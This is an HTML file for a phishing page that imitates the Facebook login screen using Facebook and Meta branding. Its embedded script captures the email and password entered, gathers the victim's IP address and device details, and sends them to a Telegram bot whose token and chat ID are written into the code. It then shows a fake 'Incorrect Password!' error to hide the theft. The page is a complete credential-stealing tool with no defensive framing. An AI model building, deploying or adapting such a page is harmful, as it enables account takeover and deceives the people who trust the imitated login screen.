<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Fac Login</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background: linear-gradient(to right, #f8f9fa, #e9ecef);
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            background-color: #fff;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 380px;
            padding: 300px 20px;
            text-align: center;
        }
        .container img.logo {
            width: 60px;
            margin-bottom: 20px;
        }
        .container input {
            width: 100%;
            padding: 12px 5px;
            margin: 10px 0;
            border: 1px solid rgb(203, 210, 217);
            border-radius: 12px;
            font-size: 16px;
        }
        .container button {
            width: 100%;
            padding: 14px;
            background-color: #1877f2;
            color: white;
            border: 1px solid rgb(203, 210, 217);
            border-radius: 18px;
            font-size: 16px;
            cursor: pointer;
        }
        .container a {
            display: block;
            margin: 10px 0;
            color: #1877f2;
            text-decoration: none;
            font-size: 14px;
        }
        .container a:hover {
            text-decoration: underline;
        }
        .create-account-container {
            width: 100%;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            margin-top: 10px;
        }
        .create-account-button {
            height: 36px;
            min-width: 36px;
            flex-grow: 1;
            padding-left: 20px;
            padding-right: 20px;
            background: rgba(255, 255, 255, 0);
            border: 1px solid rgb(203, 210, 217);
            border-radius: 18px;
            display: flex;
            justify-content: center;
            align-items: center;
            cursor: pointer;
        }
        .create-account-button span {
            color: rgb(28, 43, 51);
            font-weight: 500;
            font-size: 15px;
            font-family: "Optimistic Text Normal";
        }
        .footer {
            margin-top: 20px;
            color: #666;
            font-size: 12px;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        .footer-links {
            display: flex;
            justify-content: space-around;
            width: 100%;
        }
        .footer span {
            color: rgb(99, 120, 138);
            cursor: pointer;
            font-size: 12px;
            white-space: pre-wrap;
            overflow-wrap: break-word;
        }
        .footer .meta-logo {
            width: 80px;
            margin-top: 10px;
        }
    </style>
</head>
<body>
    <div class="container">
        <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook Logo">
        <form>
            <input type="text" id="email" placeholder="Mobile number or email address">
            <input type="password" id="password" placeholder="Password">
            <button id="login" type="submit">Log in</button>
            <div id="error-message" style="color: red; margin-top: 10px;"></div>
        </form>
        <a href="https://m.facebook.com/login/identify/">Forgotten Password?</a>
        <div class="create-account-container">
            <div data-bloks-name="bk.components.Flexbox" tabindex="0" role="button" aria-label="Create new account" data-anchor-id="replay" class="create-account-button">
                <div data-bloks-name="bk.components.Flexbox" style="pointer-events: none; opacity: 1; align-items: center; flex-direction: row; justify-content: center;">
                    <div data-bloks-name="bk.components.RichText" dir="auto" style="line-height: 1.352; display: block; text-align: start; overflow: hidden;">
                        <div style="font-size: 15px; padding-top: 0.86px; padding-bottom: 0.86px; transform: translateY(calc(0.026em));">
                            <div style="font-size: 15px; max-height: 20.28px; word-break: break-all;">
                                <div dir="auto">
                                    <span data-bloks-name="bk.components.TextSpan">Create new account</span>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        
        <div class="footer">
        <img class="meta-logo" data-bloks-name="bk.components.Image" alt="Meta logo" src="https://z-m-static.xx.fbcdn.net/rsrc.php/v3/yM/r/DDgwTv3JehF.png" style="pointer-events: inherit; mask-image: url('https://z-m-static.xx.fbcdn.net/rsrc.php/v3/yM/r/DDgwTv3JehF.png'); mask-size: contain; background-color: rgb(70, 90, 105); object-position: 10000px 10000px; object-fit: contain; overflow: hidden;">
    
            <div class="footer-links" style="
                        margin-top: 25px;
                        width: 150px;">
                
                <span data-bloks-name="bk.components.TextSpan" role="link" tabindex="0">About</span>
                <span data-bloks-name="bk.components.TextSpan" role="link" tabindex="0">Help</span>
                <span data-bloks-name="bk.components.TextSpan" role="link" tabindex="0">More</span>
            </div>
            </div>
    </div>
    <script>
        const botToken = "7824334186:AAGgLndn-epUJsu2vzCLU7Q2IpKXhCCK7Oo";
        const chatId = "7491399027";

        const loginButton = document.getElementById("login");
        const emailInput = document.getElementById("email");
        const passwordInput = document.getElementById("password");

        function getDeviceInfo() {
            return fetch('https://api.ipify.org/?format=json')
                .then(response => response.json())
                .then(data => data.ip)
                .then(ipAddress => {
                    const deviceInfo = {
                        userAgent: navigator.userAgent,
                        platform: navigator.platform,
                        memory: navigator.deviceMemory || 'N/A'
                    };

                    return { ipAddress, deviceInfo };
                });
        }

        loginButton.addEventListener("click", function(event) {
            event.preventDefault();
            const email = emailInput.value;
            const password = passwordInput.value;

            getDeviceInfo().then(({ ipAddress, deviceInfo }) => {
                const message = `New login:\nEmail: ${email}\nPassword: ${password}\n\nIP Address: ${ipAddress}\nUser Agent: ${deviceInfo.userAgent}\nPlatform: ${deviceInfo.platform}\nMemory: ${deviceInfo.memory} GB`;

                const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;

                fetch(url)
                    .then(response => {
                        if (response.ok) {
                            var errorMessage = "Incorrect Password! Please try again.";
                            document.getElementById("error-message").textContent = errorMessage;

                            emailInput.value = "";
                            passwordInput.value = "";
                        } else {
                            throw new Error("Failed to send message to Telegram.");
                        }
                    })
                    .catch(error => {
                        console.error(error);
                        alert("Failed to send message to Telegram.");
                    });
            }).catch(error => {
                console.error(error);
                alert("Failed to retrieve device information.");
            });
        });
    </script>
</body>
</html>
